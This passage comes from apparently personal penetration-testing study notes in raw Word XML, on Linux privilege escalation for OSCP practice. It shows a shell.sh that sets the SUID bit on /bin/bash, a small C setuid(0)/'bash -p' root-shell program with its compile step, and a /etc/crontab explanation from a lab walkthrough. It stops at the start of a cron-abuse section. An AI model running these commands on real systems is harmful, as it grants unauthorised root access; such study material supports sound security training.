          <w:ilvl w:val="1"/>
          <w:numId w:val="97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which chmod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="977"/>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echo "/usr/bin/chmod 4755 /bin/bash" &gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="977"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That command itself sets the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> bit (4) and normal rwxr-xr-x (755) permissions on /bin/bash.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="977"/>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4755</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → owner can read/write/execute, group/others can read/execute, and the file runs with the owner’s (root’s) privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="977"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So /bin/bash would become a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> root binary, meaning any user who runs /bin/bash gets a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="977"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So once we get shell.sh to execute, we can run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/bash -p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023FC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom script to open shell as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put the following in a C file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023FE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023FF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setuid(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002400">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/bin/bash -p");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002401">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002402">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002403">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -o &lt;name&gt; &lt;filename.c&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002404">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then get a process to execute it, giving you a root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002405">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002406">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002407">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002408">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use this website to read Cron Tab Schedule Expression</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002409">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1467"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId755">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://crontab.guru/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000240A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000240B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000240C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v4cii6z5dwko" w:id="320"/>
      <w:bookmarkEnd w:id="320"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding structure of /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000240D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000240E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3048000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15" name="image33.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image33.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75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40F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1206"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId757">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sar</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002410">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1206"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see 5 cron jobs here (the first 4 of which are standard)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002411">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1206"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These 4 manually execute cron jobs at their specified intervals</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002412">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1206"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means: as root, change directory to / and run all executable scripts in /etc/cron.hourly (via run-parts).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1206"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The test -x /usr/sbin/anacron || ... pattern</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002414">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1206"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test -x /usr/sbin/anacron checks if anacron exists and is executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002415">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1206"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">|| means “if the previous command fails”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002416">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1206"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, if anacron is not found, then it manually runs the corresponding /etc/cron.daily, /etc/cron.weekly, or /etc/cron.monthly scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002417">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1206"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Anacron does the job of running cron jobs. If it doesn't work, then it will run the stuff on the right, which manually executes cron jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002418">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1206"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The leftmost column tells us how often the cron job is run. The thing I underlined in red is called a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">crontab schedule expression</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. It's a language. You can use this website to translate it to English. Just copy and paste it into the website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002419">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1206"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId758">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://crontab.guru/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000241A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000241B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000241C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000241D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_up0qj8tdhfhl" w:id="321"/>
      <w:bookmarkEnd w:id="321"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing cron jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000241E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP 18.3.1. Abusing Cron Jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000241F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002420">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002421">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To leverage insecure file permissions, we must locate an executable file that not only allows us write access, but also runs at an elevated privilege level. On a Linux system, the</w:t>
      </w:r>
      <w:hyperlink r:id="rId759">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId760">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cron</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
